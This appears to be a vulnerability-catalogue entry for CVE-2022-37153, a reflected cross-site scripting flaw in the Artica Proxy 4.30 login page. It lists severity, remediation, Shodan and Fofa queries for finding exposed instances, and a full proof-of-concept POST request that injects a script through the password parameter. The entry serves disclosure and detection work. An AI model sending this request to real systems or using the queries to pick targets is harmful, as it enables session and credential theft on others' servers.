| Title | Artica Proxy 4.30.000000 - Cross-Site Scripting |
|---|---|
| Author | arafatansari |
| Severity | Medium |
| Impact | Attackers can inject malicious JavaScript through the password parameter in the Artica Proxy login page that reflects back to users, potentially stealing credentials or session tokens when victims submit the login form. |
| Remediation | Upgrade to a patched version of Artica Proxy or apply the vendor-supplied patch to mitigate the vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.03431 |
| CVE ID | CVE-2022-37153 |
| CWE ID | CWE-79 |
| Shodan Query | http.html:"Artica"http.html:"artica" |
| Fofa Query | body="artica" |
| Tags | cve cve2022 xss artica articatech vkev vuln |
Artica Proxy 4.30.000000 contains a cross-site scripting vulnerability via the password parameter in /fw.login.php.
POST /fw.login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/603.1.10 (KHTML, like Gecko) Version/10.1 Safari/603.1.10
Connection: close
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
userfont=&artica-language=&StandardDropDown=&HTMLTITLE=&username=admin&password=admin%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-37153.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-37153.pcap
N/AN/A